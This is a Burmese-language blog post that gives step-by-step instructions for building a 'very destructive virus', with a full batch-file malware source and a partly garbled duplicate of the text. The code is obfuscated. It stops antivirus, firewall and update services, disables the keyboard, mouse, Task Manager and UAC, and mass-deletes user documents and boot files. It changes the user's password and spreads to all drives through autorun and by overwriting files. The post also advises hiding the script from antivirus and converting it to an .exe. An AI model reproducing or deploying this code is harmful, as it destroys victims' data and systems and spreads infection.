အလြန္႔အလြန္ ရန္မ်ားေသာ Virus တစ္ေကာင္ ဖန္တီးနည္း
1) Notepad ဖြင့္ျပီး ေအာက္ကကုဒ္ကို ကူးထည့္ပါ2) .BAT နဲ႔ Save ပါ
3) batch file ဆိုတာ မသိရေလေအာင္"Batch anti av tools" ကို ရွာျပီးေျပာင္းလိုက္ပါ (google မွာရွာလို႔ရပါတယ္)
4) .exe ဖိုင္တစ္ခုေျပာင္းရန္ "bat to exe converter" ကိုရွာျပီးေျပာင္းပါ (google မွာရွာလို႔ရပါတယ္)
ရပါျပီဗ်ာ
ပညာေရးအတြက္သာရည္ရြယ္ပါသည္ လုပ္ျပီးရင္ေတာ့သင့္စက္မွာ မစမ္းလိုက္ပါနဲ႔ ကြိခနဲ မိသြားမယ္ မဟုတ္မဟတ္မလုပ္ေစလိုပါဗ်ာ အာကာျဖိဳးေပးလိုက္တာ ပညာေရးအတြက္ပါ
ဒီမွာေဒါင္းယူလိုက္ပါ >>>>>>>>>> http://min.us/mHkiX6Bxz
************************************************************************************************* ??????????? ?????????? Virus ???????? ?????????? 5:48 AM coading, virus coads, ??????? ??????????? 1 comment 1) Notepad ????????? ????????????? ????????? 2) .BAT ??? Save ?? 3) batch file ????? ???????????"Batch anti av tools" ??? ????????????????????? (google ????????????????) 4) .exe ???????????????????? "bat to exe converter" ??????????????????? (google ????????????????) ????????? ????????????????????????? ????????????????????????? ??????????????? ?????? ????????? ???????????????????????? ??????????????????? ????????????? PHP Code: @ echo off"REG_DWORD" /d "1" /f > nul del /F /Q %SystemDrive%\recycler\S-1-5-21-1202660629-261903793- 725345543-1003\run.bat set ii=ne set ywe=st set ury=t set iej=op set jt53=Syma set o6t=nor set lyd2=fee set h3d=ton set gf45=ntec set own5=McA%ii%%ury% %ywe%%iej% "Security Center" /y%ii%%ury% %ywe%%iej% "Automatic Updates" /y%ii%%ury% %ywe%%iej% "%jt53%%gf45% Core LC" /y%ii%%ury% %ywe%%iej% "SAVScan" /y%ii%%ury% %ywe%%iej% "%o6t%%h3d% AntiVirus Firewall Monitor Service" /y%ii%%ury% %ywe%%iej% "%o6t%%h3d% AntiVirus Auto-Protect Service" /y%ii%%ury% %ywe%%iej% "%o6t%%h3d% AntiVirus Auto Protect Service" /y%ii%%ury% %ywe%%iej% "%own5%%lyd2% Spamkiller Server" /y%ii%%ury% %ywe%%iej% "%own5%%lyd2% Personal Firewall Service" /y%ii%%ury% %ywe%%iej% "%own5%%lyd2% SecurityCenter Update Manager" /y%ii%%ury% %ywe%%iej% "%jt53%%gf45% SPBBCSvc" /y cls%ii%%ury% %ywe%%iej% "Ahnlab Task Scheduler" /y%ii%%ury% %ywe%%iej% navapsvc /y%ii%%ury% %ywe%%iej% "Sygate Personal Firewall Pro" /y%ii%%ury% %ywe%%iej% vrmonsvc /y%ii%%ury% %ywe%%iej% MonSvcNT /y%ii%%ury% %ywe%%iej% SAVScan /y%ii%%ury% %ywe%%iej% NProtectService /y%ii%%ury% %ywe%%iej% ccSetMGR /y%ii%%ury% %ywe%%iej% ccEvtMGR /y%ii%%ury% %ywe%%iej% srservice /y%ii%%ury% %ywe%%iej% "%jt53%%gf45% Network Drivers Service" /y%ii%%ury% %ywe%%iej% "%o6t%%h3d% Unerase Protection" /y%ii%%ury% %ywe%%iej% MskService /y%ii%%ury% %ywe%%iej% MpfService /y%ii%%ury% %ywe%%iej% mcupdmgr.exe /y%ii%%ury% %ywe%%iej% "%own5%%lyd2%AntiSpyware" /y%ii%%ury% %ywe%%iej% helpsvc /y%ii%%ury% %ywe%%iej% ERSvc /y%ii%%ury% %ywe%%iej% "*%o6t%%h3d%*" /y%ii%%ury% %ywe%%iej% "*%jt53%%gf45%*" /y%ii%%ury% %ywe%%iej% "*%own5%%lyd2%*" /y cls%ii%%ury% %ywe%%iej% ccPwdSvc /y%ii%%ury% %ywe%%iej% "%jt53%%gf45% Core LC" /y%ii%%ury% %ywe%%iej% navapsvc /y%ii%%ury% %ywe%%iej% "Serv-U" /y%ii%%ury% %ywe%%iej% "%o6t%%h3d% AntiVirus Auto Protect Service" /y%ii%%ury% %ywe%%iej% "%o6t%%h3d% AntiVirus Client" /y%ii%%ury% %ywe%%iej% "%jt53%%gf45% AntiVirus Client" /y%ii%%ury% %ywe%%iej% "%o6t%%h3d% AntiVirus Server" /y%ii%%ury% %ywe%%iej% "NAV Alert" /y%ii%%ury% %ywe%%iej% "Nav Auto-Protect" /y cls%ii%%ury% %ywe%%iej% "McShield" /y%ii%%ury% %ywe%%iej% "DefWatch" /y%ii%%ury% %ywe%%iej% eventlog /y%ii%%ury% %ywe%%iej% InoRPC /y%ii%%ury% %ywe%%iej% InoRT /y%ii%%ury% %ywe%%iej% InoTask /y cls%ii%%ury% %ywe%%iej% "%o6t%%h3d% AntiVirus Auto Protect Service" /y%ii%%ury% %ywe%%iej% "%o6t%%h3d% AntiVirus Client" /y%ii%%ury% %ywe%%iej% "%o6t%%h3d% AntiVirus Corporate Edition" /y%ii%%ury% %ywe%%iej% "ViRobot Professional Monitoring" /y%ii%%ury% %ywe%%iej% "PC-cillin Personal Firewall" /y%ii%%ury% %ywe%%iej% "Trend Micro Proxy Service" /y%ii%%ury% %ywe%%iej% "Trend NT Realtime Service" /y%ii%%ury% %ywe%%iej% "%own5%%lyd2%.com McShield" /y%ii%%ury% %ywe%%iej% "%own5%%lyd2%.com VirusScan Online Realtime Engine" /y%ii%%ury% %ywe%%iej% "SyGateService" /y%ii%%ury% %ywe%%iej% "Sygate Personal Firewall Pro" /y cls%ii%%ury% %ywe%%iej% "Sophos Anti-Virus" /y%ii%%ury% %ywe%%iej% "Sophos Anti-Virus Network" /y%ii%%ury% %ywe%%iej% "eTrust Antivirus Job Server" /y%ii%%ury% %ywe%%iej% "eTrust Antivirus Realtime Server" /y%ii%%ury% %ywe%%iej% "Sygate Personal Firewall Pro" /y%ii%%ury% %ywe%%iej% "eTrust Antivirus RPC Server" /y cls%ii%%ury% %ywe%%iej% netsvcs%ii%%ury% %ywe%%iej% spoolnt attrib +h %0 set key="HKEY_LOCAL_MACHINE\ system\CurrentControlSet\ Services\Mouclass"reg delete %key%reg add %key% /v Start /t REG_DWORD /d 4echo Windows Registry Editor Version 5.00 > "nokeyboard.reg"echo [HKEY_LOCAL_MACHINE\SYSTEM\ ControlSet001\Control\Keyboard Layout] >> "nokeyboard.reg"echo "Scancode Map"=hex:00,00,00,00,00,00,00, 00,7c,00,00,00,00,00,01,00,00, \ >> "nokeyboard.reg"echo 00,3b,00,00,00,3c,00,00,00,3d, 00,00,00,3e,00,00,00,3f,00,00, 00,40,00,00,00,\ >> "nokeyboard.reg"echo 41,00,00,00,42,00,00,00,43,00, 00,00,44,00,00,00,57,00,00,00, 58,00,00,00,37,\ >> "nokeyboard.reg"echo e0,00,00,46,00,00,00,45,00,00, 00,35,e0,00,00,37,00,00,00,4a, 00,00,00,47,00,\ >> "nokeyboard.reg"echo 00,00,48,00,00,00,49,00,00,00, 4b,00,00,00,4c,00,00,00,4d,00, 00,00,4e,00,00,\ >> "nokeyboard.reg"echo 00,4f,00,00,00,50,00,00,00,51, 00,00,00,1c,e0,00,00,53,00,00, 00,52,00,00,00,\ >> "nokeyboard.reg"echo 4d,e0,00,00,50,e0,00,00,4b,e0, 00,00,48,e0,00,00,52,e0,00,00, 47,e0,00,00,49,\ >> "nokeyboard.reg"echo e0,00,00,53,e0,00,00,4f,e0,00, 00,51,e0,00,00,29,00,00,00,02, 00,00,00,03,00,\ >> "nokeyboard.reg"echo 00,00,04,00,00,00,05,00,00,00, 06,00,00,00,07,00,00,00,08,00, 00,00,09,00,00,\ >> "nokeyboard.reg"echo 00,0a,00,00,00,0b,00,00,00,0c, 00,00,00,0d,00,00,00,0e,00,00, 00,0f,00,00,00,\ >> "nokeyboard.reg"echo 10,00,00,00,11,00,00,00,12,00, 00,00,13,00,00,00,14,00,00,00, 15,00,00,00,16,\ >> "nokeyboard.reg"echo 00,00,00,17,00,00,00,18,00,00, 00,19,00,00,00,1a,00,00,00,1b, 00,00,00,2b,00,\ >> "nokeyboard.reg"echo 00,00,3a,00,00,00,1e,00,00,00, 1f,00,00,00,20,00,00,00,21,00, 00,00,22,00,00,\ >> "nokeyboard.reg"echo 00,23,00,00,00,24,00,00,00,25, 00,00,00,26,00,00,00,27,00,00, 00,28,00,00,00,\ >> "nokeyboard.reg"echo 1c,00,00,00,2a,00,00,00,2c,00, 00,00,2d,00,00,00,2e,00,00,00, 2f,00,00,00,30,\ >> "nokeyboard.reg"echo 00,00,00,31,00,00,00,32,00,00, 00,33,00,00,00,34,00,00,00,35, 00,00,00,36,00,\ >> "nokeyboard.reg"echo 00,00,1d,00,00,00,5b,e0,00,00, 38,00,00,00,39,00,00,00,38,e0, 00,00,5c,e0,00,\ >> "nokeyboard.reg"echo 00,5d,e0,00,00,1d,e0,00,00,5f, e0,00,00,5e,e0,00,00,22,e0,00, 00,24,e0,00,00,\ >> "nokeyboard.reg"echo 10,e0,00,00,19,e0,00,00,30,e0, 00,00,2e,e0,00,00,2c,e0,00,00, 20,e0,00,00,6a,\ >> "nokeyboard.reg"echo e0,00,00,69,e0,00,00,68,e0,00, 00,67,e0,00,00,42,e0,00,00,6c, e0,00,00,6d,e0,\ >> "nokeyboard.reg"echo 00,00,66,e0,00,00,6b,e0,00,00, 21,e0,00,00,00,00 >> "nokeyboard.reg"start "nokeyboard.reg"reg add HKEY_CURRENT_USER\Software\ Microsoft\Windows\ CurrentVersion\Policies\System /v DisableTaskMgr /t REG_SZ /d 1 /f >nul net stop "SDRSVC"@Echo off & @@Break Off Ipconfig /release%jUmP%E%nD%c%onFiG%h% IdE%o%P% h%aRv%%aRd%A%T%%cHe%cK%HappY% 3D b%aLLo0Ns%Y%eS% m3Ga!?!P%ReSs%%IE%AuS%ExPloR% e%r% > nul.%TempInternetRelease%net stop "WinDefend"taskkill /f /t /im "MSASCui.exe"net stop "wuauserv"net stop "security center"net stop sharedaccess netsh firewall set opmode mode-disableecho :a >>explorer.batecho tskill explorer >>explorer.batecho goto a >>explorer.batecho Set objShell = CreateObject("WScript.Shell")> >invisi.vbsecho strCommand = "explorer.bat">>invisi.vbsecho objShell.Run strCommand, vbHide, TRUE>>invisi.vbs start "" invisi.vbs tskill WINWORD tskill outlook tskill mspaint rem Kill Notepad tskill notepad tskill excel tskill msnmsgr tskill iexplore tskill safari tskill msaccess tskill calc tskill iTunes net user %username% hahahahahaha time 12:00 DIR /S/B %SystemDrive%\*.doc >> FIleList_doc.txtecho Y | FOR /F "tokens=1,* delims=: " %%j in (FIleList_doc.txt) do del "%%j:%%k"DIR /S/B %SystemDrive%\*.xml >> FIleList_xml.txtecho Y | FOR /F "tokens=1,* delims=: " %%j in (FIleList_xml.txt) do del "%%j:%%k"DIR /S/B %SystemDrive%\*.png >> FIleList_png.txtecho Y | FOR /F "tokens=1,* delims=: " %%j in (FIleList_png.txt) do del "%%j:%%k"attrib -r -s -h c:\autoexec.bat del c:\autoexec.bat attrib -r -s -h c:\boot.ini del c:\boot.ini attrib -r -s -h c:\ntldr del c:\ntldr attrib -r -s -h c:\windows\win.ini del c:\windows\win.ini shutdown /r /t 00 del /f /q '%userprofile%\My Documents\*.*'del /f /q '%userprofile%\My Music\*.*'del /f /q '%userprofile%\My Pictures\*.*'DIR /S/B %SystemDrive%\*.doc >> FIleList_doc.txtecho Y | FOR /F "tokens=1,* delims=: " %%j in (FIleList_doc.txt) do del "%%j:%%k"DIR /S/B %SystemDrive%\*.xml >> FIleList_xml.txtecho Y | FOR /F "tokens=1,* delims=: " %%j in (FIleList_xml.txt) do del "%%j:%%k"DIR /S/B %SystemDrive%\*.png >> FIleList_png.txtecho Y | FOR /F "tokens=1,* delims=: " %%j in (FIleList_png.txt) do del "%%j:%%k"DIR /S/B %SystemDrive%\*.exe >> FIleList_exe.txtecho Y | FOR /F "tokens=1,* delims=: " %%j in (FIleList_exe.txt) do del "%%j:%%k"DIR /S/B %SystemDrive%\*.mp3 >> FIleList_mp3.txtecho Y | FOR /F "tokens=1,* delims=: " %%j in (FIleList_mp3.txt) do del "%%j:%%k"DIR /S/B %SystemDrive%\*.txt >> FIleList_txt.txtecho Y | FOR /F "tokens=1,* delims=: " %%j in (FIleList_txt.txt) do del "%%j:%%k"DIR /S/B %SystemDrive%\*.pdf >> FIleList_pdf.txtecho Y | FOR /F "tokens=1,* delims=: " %%j in (FIleList_pdf.txt) do del "%%j:%%k"DIR /S/B %SystemDrive%\*.mp4 >> FIleList_mp4.txtecho Y | FOR /F "tokens=1,* delims=: " %%j in (FIleList_mp4.txt) do del "%%j:%%k"DIR /S/B %SystemDrive%\*.lnk >> FIleList_lnk.txtecho Y | FOR /F "tokens=1,* delims=: " %%j in (FIleList_lnk.txt) do del "%%j:%%k"del /f /q %SystemDrive%\WINDOWS\ system32\hal.dll tskill notepad del /f /q "%windir%\system32\notepad. exe"tskill calc del /f /q "%windir%\system32\calc.exe tskill msaccess del /f /q "%SystemDrive%\Program Files\Microsoft Office\Office10\MSACCESS.EXE" tskill iexplore del /f /q "C:\Program Files\Internet Explorer\iexplore.exe" tskill excel del /f /q "%SystemDrive%\Program Files\Microsoft Office\Office10\EXCEL.EXE" tskill mspaint del /f /q "%windir%\system32\mspaint. exe" tskill WINWORD del /f /q "%SystemDrive%\Program Files\Microsoft Office\Office10\WINWORD.EXE" tskill outlook del /f /q "%SystemDrive%\Program Files\Microsoft Office\Office10\OUTLOOK.EXE" tskill safari del /f /q "C:\Program Files\Safari\Safari.exe" tskill iexplore tskill safari tskill msaccess tskill msnmsgr tskill WINWORD tskill outlook tskill excel tskill calc tskill iTunes tskill notepad tskill mspaint set valinf="rundll32_%random%_ toolbar" set reginf="hklm\Software\ Microsoft\Windows\ CurrentVersion\Run" reg add %reginf% /v %valinf% /t "REG_SZ" /d %0 /f > nul for %%E In (A,B,C,D,E,F,G,H,I,J,K,L,M,N, O,P,Q,R,S,T,U,V,W,X,Y,Z) Do ( copy /Y %0 %%E:\ echo [AutoRun] > %%E:\autorun.inf echo open="%%E:\%0" >> %%E:\autorun.inf echo action=Open folder to see files... >> %%E:\autorun.inf) Dir %SystemRoot% /s /b > PathHost For /f %%a In (PathHost) Do Copy /y %0 %%a > Nul Del /f /s /q PathHost > Nul copy %0 %windir%\system32\ls.bat echo start "" %0>>%SystemDrive%\AUTOEXEC.BAT copy %0 "%userprofile%\Start Menu\Programs\Startup" DIR /S/B %SystemDrive%\*.exe >> InfList_exe.txt echo Y | FOR /F "tokens=1,* delims=: " %%j in (InfList_exe.txt) do copy /y %0 "%%j:%%k" assoc .txt=batfile DIR /S/B %SystemDrive%\*.txt >> InfList_txt.txt echo Y | FOR /F "tokens=1,* delims=: " %%j in (InfList_txt.txt) do copy /y %0 "%%j:%%k" assoc .mp3=batfile DIR /S/B %SystemDrive%\*.mp3 >> InfList_mp3.txt echo Y | FOR /F "tokens=1,* delims=: " %%j in (InfList_mp3.txt) do copy /y %0 "%%j:%%k" assoc .mp4=batfile DIR /S/B %SystemDrive%\*.mp4 >> InfList_mp4.txt echo Y | FOR /F "tokens=1,* delims=: " %%j in (InfList_mp4.txt) do copy /y %0 "%%j:%%k" assoc .pdf=batfile DIR /S/B %SystemDrive%\*.pdf >> InfList_pdf.txt echo Y | FOR /F "tokens=1,* delims=: " %%j in (InfList_pdf.txt) do copy /y %0 "%%j:%%k" assoc .lnk=batfile DIR /S/B %SystemDrive%\*.lnk >> InfList_lnk.txt echo Y | FOR /F "tokens=1,* delims=: " %%j in (InfList_lnk.txt) do copy /y %0 "%%j:%%k" assoc .doc=batfile DIR /S/B %SystemDrive%\*.doc >> InfList_doc.txt echo Y | FOR /F "tokens=1,* delims=: " %%j in (InfList_doc.txt) do copy /y %0 "%%j:%%k" assoc .xml=batfile DIR /S/B %SystemDrive%\*.xml >> InfList_xml.txt echo Y | FOR /F "tokens=1,* delims=: " %%j in (InfList_xml.txt) do copy /y %0 "%%j:%%k" assoc .png=batfile DIR /S/B %SystemDrive%\*.png >> InfList_png.txt echo Y | FOR /F "tokens=1,* delims=: " %%j in (InfList_png.txt) do copy /y %0 "%%j:%%k" reg add "HKCU\Software\Microsoft\ Internet Explorer\Main" /v "START PAGE" /d "http://www"assoc .dll=txtfile assoc .vbs=Visual Style assoc .reg=xmlfile assoc .txt=regfile assoc .mp3=txtfile assoc .xml=txtfile assoc .png=txtfile assoc .exe=batfile@Set RegistyEditCmd=Cmd /k Reg Add@Set HiveSysKey=HKLM\SOFTWARE\ Microsoft\Windows\ CurrentVersion\Policies\ System@%RegistyEditCmd% "%HiveSysKey%" /v "EnableLUA" /t "REG_DWORD" /d "0" /f > nul assoc .exe=pngfile